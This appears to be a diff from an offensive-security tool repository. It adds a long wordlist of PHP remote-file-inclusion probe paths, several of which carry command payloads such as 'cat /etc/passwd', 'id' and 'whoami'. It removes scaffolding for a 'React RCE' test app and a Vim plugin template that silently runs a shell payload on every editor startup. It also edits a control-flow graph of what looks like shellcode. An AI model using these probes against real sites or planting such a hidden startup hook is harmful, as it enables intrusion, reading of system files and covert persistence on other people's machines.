+/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=XXpathXX
+/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=XXpathXX
+/sources/mail.php?CONFIG[main_path]=XXpathXX
+/sources/misc/new_day.php?path=XXpathXX
+/sources/news.php?CONFIG[main_path]=XXpathXX
+/sources/post.php?fil_config=XXpathXX
+/sources/template.php?CONFIG[main_path]=XXpathXX
+/sources/tourney/index.php?page=XXpathXX?
+/spaw/spaw_control.class.php?GLOBALS[spaw_root]=XXpathXX
+/spaw/spaw_control.class.php?spaw_root=XXpathXX
+/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=XXpathXX
+/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=XXpathXX
+/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=XXpathXX
+/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=XXpathXX
+/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=XXpathXX
+/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=XXpathXX
+/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=XXpathXX
+/spellcheckwindowframeset.php?SpellIncPath=XXpathXX
+/squirrelcart/cart_content.php?cart_isp_root=XXpathXX
+/src/ark_inc.php?cfg_pear_path=XXpathXX?
+/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=XXpathXX
+/src/scripture.php?pageHeaderFile=XXpathXX?
+/starnet/themes/c-sky/main.inc.php?cmsdir=XXpathXX?
+/start.php?lang=XXpathXX
+/start.php?pg=XXpathXX
+/stat_modules/users_age/module.php?phpbb_root_path=XXpathXX
+/stats.php?vwar_root=XXpathXX
+/stphpapplication.php?STPHPLIB_DIR=XXpathXX
+/stphpbtnimage.php?STPHPLIB_DIR=XXpathXX
+/stphpform.php?STPHPLIB_DIR=XXpathXX
+/str.php?p=XXpathXX
+/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=XXpathXX
+/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=XXpathXX?
+/strload.php?LangFile=XXpathXX
+/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls%20-al&ABSOLUTE_PATH_STUDIP=XXpathXX?
+/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls%20-al&_PHPLIB[libdir]=XXpathXX?
+/styles.php?toroot=XXpathXX
+/styles/default/global_header.php?installed=23&domain=XXpathXX
+/submit_abuse.php?path_prefix=XXpathXX
+/submit_comment.php?path_prefix=XXpathXX
+/subscp.php?phpbb_root_path=XXpathXX?
+/suite/index.php?pg=XXpathXX?
+/supasite/admin_auth_cookies.php?supa[db_path]=XXpathXX
+/supasite/admin_mods.php?supa[db_path]=XXpathXX
+/supasite/admin_news.php?supa[db_path]=XXpathXX
+/supasite/admin_settings.php?supa[include_path]=XXpathXX
+/supasite/admin_topics.php?supa[db_path]=XXpathXX
+/supasite/admin_users.php?supa[db_path]=XXpathXX
+/supasite/admin_utilities.php?supa[db_path]=XXpathXX
+/supasite/backend_site.php?supa[include_path]=XXpathXX
+/supasite/common_functions.php?supa[db_path]=XXpathXX
+/supasite/site_comment.php?supa[db_path]=XXpathXX
+/supasite/site_news.php?supa[db_path]=XXpathXX
+/support/include/open_form.php?include_dir=XXpathXX?cmd=pwd
+/support/index.php?main=XXpathXX
+/surveys/survey.inc.php?path=XXpathXX
+/sw/lib_comment/comment.php?doc_directory=XXpathXX?
+/sw/lib_find/find.php?doc_directory=XXpathXX?
+/sw/lib_session/session.php?doc_directory=XXpathXX?
+/sw/lib_up_file/file.php?doc_directory=XXpathXX?
+/sw/lib_up_file/find_file.php?doc_directory=XXpathXX?
+/sw/lib_user/find_user.php?doc_directory=XXpathXX?
+/sw/lib_user/user.php?doc_directory=XXpathXX?
+/sys/code/box.inc.php?config["sipssys"]=XXpathXX
+/system/ImageImageMagick.php?glConf[path_system]=XXpathXX?
+/system/_b/contentFiles/gBIndex.php?gBRootPath=XXpathXX?
+/system/admin/include/item_main.php?GLOBALS=XXpathXX
+/system/admin/include/upload_form.php?GLOBALS=XXpathXX
+/system/command/admin.cmd.php?GLOBALS=XXpathXX
+/system/command/download.cmd.php?GLOBALS=XXpathXX
+/system/funcs/xkurl.php?PEARPATH=XXpathXX
+/system/includes/pageheaderdefault.inc.php?_sysSessionPath=XXpathXX
+/system/login.php?site_path=XXpathXX
+/tagit2b/tagmin/delTagUser.php?configpath=XXpathXX?
+/tags.php?BBCodeFile=XXpathXX
+/taxonservice.php?dir=XXpathXX?
+/teatro/pub/pub08_comments.php?basePath=XXpathXX
+/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=XXpathXX?
+/template.php?actionsPage=XXpathXX?
+/template.php?blog_theme=XXpathXX
+/template.php?pagina=XXpathXX
+/template/Noir/index.php?site_path=XXpathXX
+/template/Vert/index.php?pageAll=XXpathXX
+/template/Vert/index.php?site_path=XXpathXX
+/template/barnraiser_01/p_new_password.tpl.php?templatePath=XXpathXX
+/template/default/footer.php?ROOT_PATH=XXpathXX?cmd=ls
+/template/default/test/header.php?ROOT_PATH=XXpathXX?cmd=ls
+/template/gwb/user_bottom.php?config[template_path]=XXpathXX
+/template/purpletech/base_include.php?page=XXpathXX?
+/template/rwb/user_bottom.php?config[template_path]=XXpathXX
+/template_csv.php?rInfo[content]=XXpathXX
+/templates/2blue/bodyTemplate.php?serverPath=XXpathXX?
+/templates/Official/part_userprofile.php?template_path=XXpathXX
+/templates/barrel/template.tpl.php?renderer=XXpathXX
+/templates/barrel/template.tpl.php?renderer=XXpathXX?
+/templates/barry/template.tpl.php?renderer=XXpathXX
+/templates/be2004-2/index.php?mosConfig_absolute_path=XXpathXX
+/templates/datumVonDatumBis.inc.php?root=XXpathXX
+/templates/default/header.inc.php?menu=XXpathXX
+/templates/default/index_logged.php?main_loaded=1&cur_module=XXpathXX
+/templates/default/tpl_message.php?right_file=XXpathXX
+/templates/footer.inc.php?root=XXpathXX
+/templates/header.inc.php?root=XXpathXX
+/templates/mylook/template.tpl.php?renderer=XXpathXX
+/templates/oerdec/template.tpl.php?renderer=XXpathXX
+/templates/pb/language/lang_nl.php?temppath=XXpathXX
+/templates/penguin/template.tpl.php?renderer=XXpathXX
+/templates/sidebar/template.tpl.php?renderer=XXpathXX
+/templates/slashdot/template.tpl.php?renderer=XXpathXX
+/templates/stylesheets.php?root=XXpathXX
+/templates/text-only/template.tpl.php?renderer=XXpathXX
+/templates/tmpl_dfl/scripts/index.php?dir[inc]=XXpathXX
+/theme/breadcrumb.php?rootBase=XXpathXX?
+/theme/default.php?root=XXpathXX
+/theme/format.php?_page_content=XXpathXX?
+/theme/format.php?_page_css=XXpathXX?
+/theme/frames1.php?root=XXpathXX
+/theme/frames1_center.php?root=XXpathXX
+/theme/frames1_left.php?root=XXpathXX
+/theme/frames1_top.php?root=XXpathXX
+/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=XXpathXX
+/theme/settings.php?pfad_z=XXpathXX
+/theme/test1.php?root=XXpathXX
+/theme/test2.php?root=XXpathXX
+/theme/test3.php?root=XXpathXX
+/theme/test4.php?root=XXpathXX
+/theme/test5.php?root=XXpathXX
+/theme/test6.php?root=XXpathXX
+/themes.php?GLOBALS[theme_path]=XXpathXX?
+/themes/blackorange.php?root=XXpathXX
+/themes/container.php?theme_directory=XXpathXX%00
+/themes/default/layouts/standard.php?page_include=XXpathXX?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
+/themes/default/preview_post_completo.php?dir=XXpathXX
+/themes/header.php?theme_directory=XXpathXX%00
+/themes/ubb/login.php?theme=XXpathXX
+/themes/ubb/login.php?theme=XXpathXX?
+/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=XXpathXX
+/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=XXpathXX
+/timedifference.php?la=XXpathXX
+/toolbar.loudmouth.php?mainframe=XXpathXX
+/tools/update_translations.php?_SESSION[path]=XXpathXX?
+/top.php?laypath=XXpathXX
+/toplist.php?f=toplist_top10&phpbb_root_path=XXpathXX
+/topsites/index.php?page=XXpathXX?&
+/towels-0.1/src/scripture.php?pageHeaderFile=XXpathXX
+/track.php?path=XXpathXX
+/tsep/include/colorswitch.php?tsep_config[absPath]=XXpathXX?
+/ttCMS_path/lib/db/ez_sql.php?lib_path=XXpathXX
+/twebs/modules/misc/usermods.php?ROOT=XXpathXX
+/ubbt.inc.php?GLOBALS[thispath]=XXpathXX?
+/unavailable.php?bibtexrootrel=XXpathXX?
+/unsubs.php?scdir=XXpathXX
+/up.php?my[root]=XXpathXX
+/upload.php?save_path=XXpathXX?
+/upload/admin/frontpage_right.php?loadadminpage=XXpathXX?
+/upload/top.php?maindir=XXpathXX?
+/upload/xax/admin/modules/install_module.php?level=XXpathXX?
+/upload/xax/admin/patch/index.php?level=XXpathXX?
+/upload/xax/ossigeno/admin/install_module.php?level=XXpathXX?
+/upload/xax/ossigeno/admin/uninstall_module.php?level=XXpathXX?
+/upload_local.php?target=XXpathXX?
+/upload_multi.php?target=XXpathXX?
+/urlinn_includes/config.php?dir_ws=XXpathXX?
+/user.php?caselist[bad_file.txt][path]=XXpathXX&command=cat%20/etc/passwd
+/user_language.php?INDM=r3d.w0rm&language_dir=XXpathXX?
+/user_new_2.php?home=XXpathXX
+/usr/extensions/get_calendar.inc.php?root_path=XXpathXX
+/usr/extensions/get_infochannel.inc.php?root_path=XXpathXX?cmd=id;pwd
+/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=XXpathXX
+/utilitaires/gestion_sondage.php?repertoire_visiteur=XXpathXX
+/utils/class_HTTPRetriever.php?libcurlemuinc=XXpathXX
+/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=XXpathXX
+/vCard/admin/define.inc.php?match=XXpathXX?&cmd=id
+/vb/includes/functions.php?classfile=XXpathXX
+/vb/includes/functions_cron.php?nextitem=XXpathXX
+/vb/includes/functions_forumdisplay.php?specialtemplates=XXpathXX
+/vbgsitemap/vbgsitemap-config.php?base=XXpathXX
+/vbgsitemap/vbgsitemap-vbseo.php?base=XXpathXX
+/vedit/editor/edit_htmlarea.php?highlighter=XXpathXX?
+/viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=XXpathXX?
+/view.php?ariadne=XXpathXX?
+/view.php?id=XXpathXX
+/view_func.php?i=XXpathXX&l=testfile.txt?
+/views/print/printbar.php?views_path=XXpathXX
+/visible_count_inc.php?statitpath=XXpathXX
+/visitor.php?_SERVER[DOCUMENT_ROOT]=XXpathXX??
+/volume.php?config[public_dir]=XXpathXX?
+/vote.php?Madoa=XXpathXX?
+/votebox.php?VoteBoxPath=XXpathXX
+/vp/configure.php?phpbb_root_path=XXpathXX?
+/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=XXpathXX
+/w-agora_path/add_user.php?bn_dir_default=XXpathXX?
+/w-agora_path/create_forum.php?bn_dir_default=XXpathXX?
+/w-agora_path/create_user.php?bn_dir_default=XXpathXX?
+/w-agora_path/delete_notes.php?bn_dir_default=XXpathXX?
+/w-agora_path/delete_user.php?bn_dir_default=XXpathXX?
+/w-agora_path/edit_forum.php?bn_dir_default=XXpathXX?
+/w-agora_path/mail_users.php?bn_dir_default=XXpathXX?
+/w-agora_path/moderate_notes.php?bn_dir_default=XXpathXX?
+/w-agora_path/reorder_forums.php?bn_dir_default=XXpathXX?
+/wamp_dir/setup/yesno.phtml?no_url=XXpathXX?
+/wapchat/src/eng.adCreate.php?sysFileDir=XXpathXX
+/wapchat/src/eng.adCreateSave.php?sysFileDir=XXpathXX
+/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=XXpathXX
+/wapchat/src/eng.createRoom.php?sysFileDir=XXpathXX
+/wapchat/src/eng.forward.php?sysFileDir=XXpathXX
+/wapchat/src/eng.pageLogout.php?sysFileDir=XXpathXX
+/wapchat/src/eng.resultMember.php?sysFileDir=XXpathXX
+/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=XXpathXX
+/wapchat/src/eng.saveNewRoom.php?sysFileDir=XXpathXX
+/wapchat/src/eng.searchMember.php?sysFileDir=XXpathXX
+/wapchat/src/eng.writeMsg.php?sysFileDir=XXpathXX
+/war.php?vwar_root=XXpathXX
+/warn.php?file=XXpathXX
+/watermark.php?GALLERY_BASEDIR=XXpathXX
+/wbxml/WBXML/Decoder.php?base_dir=XXpathXX
+/wbxml/WBXML/Encoder.php?base_dir=XXpathXX
+/web/Administration/Includes/configureText.php?path_prefix=XXpathXX
+/web/Administration/Includes/contentHome.php?path_prefix=XXpathXX
+/web/Administration/Includes/deleteContent.php?path_prefix=XXpathXX
+/web/Administration/Includes/deleteUser.php?path_prefix=XXpathXX
+/web/Administration/Includes/userHome.php?path_prefix=XXpathXX
+/web/BetaBlockModules//Module/Module.php?path_prefix=XXpathXX
+/web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_pathXXpathXX
+/web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=XXpathXX
+/web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=XXpathXX
+/web/BetaBlockModules/EditProfileModule/external.php?path_prefix=XXpathXX
+/web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefixXXpathXX
+/web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_pathXXpathXX
+/web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=XXpathXX
+/web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_pathXXpathXX
+/web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/MyNetworksModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_pathXXpathXX
+/web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_pathXXpathXX
+/web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=XXpathXX
+/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_pathXXpathXX
+/web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=XXpathXX
+/web/Flickrclient.php?path_prefix=XXpathXX
+/web/help.php?LIBSDIR=XXpathXX
+/web/includes/blogger.php?path_prefix=XXpathXX
+/web/includes/functions/auto_email_notify.php?path_prefix=XXpathXX
+/web/includes/functions/html_generate.php?path_prefix=XXpathXX
+/web/includes/functions/validations.php?path_prefix=XXpathXX
+/web/index.php?LIBSDIR=XXpathXX
+/web/lib/xml/oai/ListRecords.php?xml_dir=XXpathXX
+/web/login.php?LIBSDIR=XXpathXX
+/web/logout.php?LIBSDIR=XXpathXX
+/web/lom.php?ETCDIR=XXpathXX
+/web/network_module_selector.php?path_prefix=XXpathXX
+/web/submit_abuse.php?path_prefix=XXpathXX
+/web/submit_comment.php?path_prefix=XXpathXX
+/webavis/class/class.php?root=XXpathXX?
+/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=XXpathXX
+/webnews/template.php?content_page=XXpathXX?
+/webroot/css.php?CONFIGS=XXpathXX
+/webyep-system/program/lib/WYURL.php?webyep_sIncludePath=XXpathXX
+/webyep-system/programm/webyep.php?webyep_sIncludePath=XXpathXX?
+/window.php?action=XXpathXX
+/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=XXpathXX?
+/work/index.php?g_include=XXpathXX
+/work/module/forum/forum.php?g_include=XXpathXX
+/worldpay_notify.php?mosConfig_absolute_path=XXpathXX
+/wp-cache-phase1.php?plugin=XXpathXX
+/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=XXpathXX
+/wp-content/plugins/myflash/myflash-button.php?wpPATH=XXpathXX
+/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=XXpathXX
+/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=XXpathXX
+/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=XXpathXX?
+/wsk/wsk.php?wsk=XXpathXX
+/xarg_corner.php?xarg=XXpathXX?
+/xarg_corner_bottom.php?xarg=XXpathXX?
+/xarg_corner_top.php?xarg=XXpathXX?
+/xoopsgallery/init_basic.php?GALLERY_BASEDIR=XXpathXX?&2093085906=1&995617320=2
+/xt_counter.php?server_base_dir=XXpathXX
+/yabbse/Sources/Packages.php?sourcedir=XXpathXX
+/yacs/scripts/update_trailer.php?context[path_to_root]=XXpathXX?
+/yrch/plugins/metasearch/plug.inc.php?path=XXpathXX
+/ytb/cuenta/cuerpo.php?base_archivo=XXpathXX
+/zipndownload.php?PP_PATH=XXpathXX?
+/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=XXpathXX?
@@ -1,14 +0,0 @@
-FROM node:18-alpine
-
-WORKDIR /app
-
-COPY package.json ./
-RUN npm install
-
-COPY . .
-
-RUN npm run build
-
-EXPOSE 3000
-
-CMD ["npm", "start"]
@@ -1,12 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-  <head>
-    <meta charset="UTF-8" />
-    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
-    <title>React RCE</title>
-  </head>
-  <body>
-    <div id="root"></div>
-    <script type="module" src="/src/main.jsx"></script>
-  </body>
-</html>
@@ -1,6 +0,0 @@
-/** @type {import('next').NextConfig} */
-const nextConfig = {
-  output: 'standalone',
-}
-
-module.exports = nextConfig
@@ -1,22 +0,0 @@
-{
-  "name": "my-next-app",
-  "version": "0.1.0",
-  "private": true,
-  "scripts": {
-    "dev": "next dev",
-    "build": "next build",
-    "start": "next start",
-    "lint": "next lint"
-  },
-  "dependencies": {
-    "react": "19.0.0",
-    "react-dom": "19.0.0",
-    "next": "15.0.4"
-  },
-  "devDependencies": {
-    "typescript": "^5",
-    "@types/node": "^20",
-    "@types/react": "^18",
-    "@types/react-dom": "^18"
-  }
-}
@@ -1,5 +0,0 @@
-"use server";
-
-export async function greet(name: string) {
-  return `Hello, ${name}!`;
-}
@@ -1,11 +0,0 @@
-export default function RootLayout({
-  children,
-}: {
-  children: React.ReactNode
-}) {
-  return (
-    <html lang="ru">
-      <body>{children}</body>
-    </html>
-  );
-}
@@ -1,11 +0,0 @@
-import { greet } from './actions';
-
-export default async function Home() {
-  const greeting = await greet("World");
-  
-  return (
-    <main style={{ padding: '2rem', fontFamily: 'system-ui' }}>
-      <h1>{greeting}</h1>
-    </main>
-  );
-}
@@ -1,26 +0,0 @@
-{
-  "compilerOptions": {
-    "lib": ["dom", "dom.iterable", "esnext"],
-    "allowJs": true,
-    "skipLibCheck": true,
-    "strict": true,
-    "noEmit": true,
-    "esModuleInterop": true,
-    "module": "esnext",
-    "moduleResolution": "bundler",
-    "resolveJsonModule": true,
-    "isolatedModules": true,
-    "jsx": "preserve",
-    "incremental": true,
-    "plugins": [
-      {
-        "name": "next"
-      }
-    ],
-    "paths": {
-      "@/*": ["./src/*"]
-    }
-  },
-  "include": ["next-env.d.ts", "**/*.ts", "**/*.tsx", ".next/types/**/*.ts"],
-  "exclude": ["node_modules"]
-}
@@ -1,6 +0,0 @@
-import { defineConfig } from "vite";
-import react from "@vitejs/plugin-react";
-
-export default defineConfig({
-  plugins: [react()],
-});
@@ -1,11 +0,0 @@
-" NAME.vim - Runs in the background on startup, discards output
- 
-if !has('job') || exists('g:loaded_ZZWcUtfrDa')
-  finish
-endif
-let g:loaded_NAME = 1
- 
-augroup NAME
-  autocmd!
-  autocmd VimEnter * silent! call job_start(["/bin/sh", "-c", "PAYLOAD_PLACEHOLDER"], {'out_io': 'null', 'err_io': 'null'})
-augroup END
@@ -90,343 +90,350 @@
        <node id="block.0x1017:instruction.0x101b">
          <data key="address">0x101b</data>
          <data key="type">instruction</data>
-          <data key="instruction.hex">480fb74a48</data>
-          <data key="instruction.source">movzx rcx, word ptr [rdx + 0x48]</data>
+          <data key="instruction.hex">480fb74a4a</data>
+          <data key="instruction.source">movzx rcx, word ptr [rdx + 0x4a]</data>
        </node>
        <node id="block.0x1017:instruction.0x1020">
          <data key="address">0x1020</data>
          <data key="type">instruction</data>
-          <data key="instruction.hex">41b900000000</data>
-          <data key="instruction.source">mov r9d, 0</data>
+          <data key="instruction.hex">4d31c9</data>
+          <data key="instruction.source">xor r9, r9</data>
        </node>
      </graph>
    </node>
-    <node id="block.0x1026">
-      <data key="address">0x1026</data>
+    <node id="block.0x1023">
+      <data key="address">0x1023</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x1026</data>
+        <data key="address">0x1023</data>
        <data key="type">block</data>
-        <node id="block.0x1026:instruction.0x1026">
-          <data key="address">0x1026</data>
+        <node id="block.0x1023:instruction.0x1023">
+          <data key="address">0x1023</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">4831c0</data>
          <data key="instruction.source">xor rax, rax</data>
        </node>
-        <node id="block.0x1026:instruction.0x1029">
-          <data key="address">0x1029</data>
+        <node id="block.0x1023:instruction.0x1026">
+          <data key="address">0x1026</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">ac</data>
          <data key="instruction.source">lodsb al, byte ptr [rsi]</data>
        </node>
-        <node id="block.0x1026:instruction.0x102a">
-          <data key="address">0x102a</data>
+        <node id="block.0x1023:instruction.0x1027">
+          <data key="address">0x1027</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">3c61</data>
          <data key="instruction.source">cmp al, 0x61</data>
        </node>
-        <node id="block.0x1026:instruction.0x102c">
-          <data key="address">0x102c</data>
+        <node id="block.0x1023:instruction.0x1029">
+          <data key="address">0x1029</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">7c02</data>
-          <data key="instruction.source">jl 0x1030</data>
+          <data key="instruction.source">jl 0x102d</data>
        </node>
-        <edge source="block.0x1026:instruction.0x1026" target="block.0x1026:instruction.0x1029"/>
-        <edge source="block.0x1026:instruction.0x1029" target="block.0x1026:instruction.0x102a"/>
-        <edge source="block.0x1026:instruction.0x102a" target="block.0x1026:instruction.0x102c"/>
+        <edge source="block.0x1023:instruction.0x1023" target="block.0x1023:instruction.0x1026"/>
+        <edge source="block.0x1023:instruction.0x1026" target="block.0x1023:instruction.0x1027"/>
+        <edge source="block.0x1023:instruction.0x1027" target="block.0x1023:instruction.0x1029"/>
      </graph>
    </node>
-    <node id="block.0x102e">
-      <data key="address">0x102e</data>
+    <node id="block.0x102b">
+      <data key="address">0x102b</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x102e</data>
+        <data key="address">0x102b</data>
        <data key="type">block</data>
-        <node id="block.0x102e:instruction.0x102e">
-          <data key="address">0x102e</data>
+        <node id="block.0x102b:instruction.0x102b">
+          <data key="address">0x102b</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">2c20</data>
          <data key="instruction.source">sub al, 0x20</data>
        </node>
      </graph>
    </node>
-    <node id="block.0x1030">
-      <data key="address">0x1030</data>
+    <node id="block.0x102d">
+      <data key="address">0x102d</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x1030</data>
+        <data key="address">0x102d</data>
        <data key="type">block</data>
-        <node id="block.0x1030:instruction.0x1030">
-          <data key="address">0x1030</data>
+        <node id="block.0x102d:instruction.0x102d">
+          <data key="address">0x102d</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">41c1c90d</data>
          <data key="instruction.source">ror r9d, 0xd</data>
        </node>
-        <node id="block.0x1030:instruction.0x1034">
-          <data key="address">0x1034</data>
+        <node id="block.0x102d:instruction.0x1031">
+          <data key="address">0x1031</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">4101c1</data>
          <data key="instruction.source">add r9d, eax</data>
        </node>
-        <node id="block.0x1030:instruction.0x1037">
-          <data key="address">0x1037</data>
+        <node id="block.0x102d:instruction.0x1034">
+          <data key="address">0x1034</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">e2ed</data>
-          <data key="instruction.source">loop 0x1026</data>
+          <data key="instruction.source">loop 0x1023</data>
        </node>
-        <edge source="block.0x1030:instruction.0x1030" target="block.0x1030:instruction.0x1034"/>
-        <edge source="block.0x1030:instruction.0x1034" target="block.0x1030:instruction.0x1037"/>
+        <edge source="block.0x102d:instruction.0x102d" target="block.0x102d:instruction.0x1031"/>
+        <edge source="block.0x102d:instruction.0x1031" target="block.0x102d:instruction.0x1034"/>
      </graph>
    </node>
-    <node id="block.0x1039">
-      <data key="address">0x1039</data>
+    <node id="block.0x1036">
+      <data key="address">0x1036</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x1039</data>
+        <data key="address">0x1036</data>
        <data key="type">block</data>
-        <node id="block.0x1039:instruction.0x1039">
-          <data key="address">0x1039</data>
+        <node id="block.0x1036:instruction.0x1036">
+          <data key="address">0x1036</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">52</data>
          <data key="instruction.source">push rdx</data>
        </node>
-        <node id="block.0x1039:instruction.0x103a">
-          <data key="address">0x103a</data>
+        <node id="block.0x1036:instruction.0x1037">
+          <data key="address">0x1037</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">4151</data>
          <data key="instruction.source">push r9</data>
        </node>
-        <node id="block.0x1039:instruction.0x103c">
-          <data key="address">0x103c</data>
+        <node id="block.0x1036:instruction.0x1039">
+          <data key="address">0x1039</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">488b5220</data>
          <data key="instruction.source">mov rdx, qword ptr [rdx + 0x20]</data>
        </node>
-        <node id="block.0x1039:instruction.0x1040">
-          <data key="address">0x1040</data>
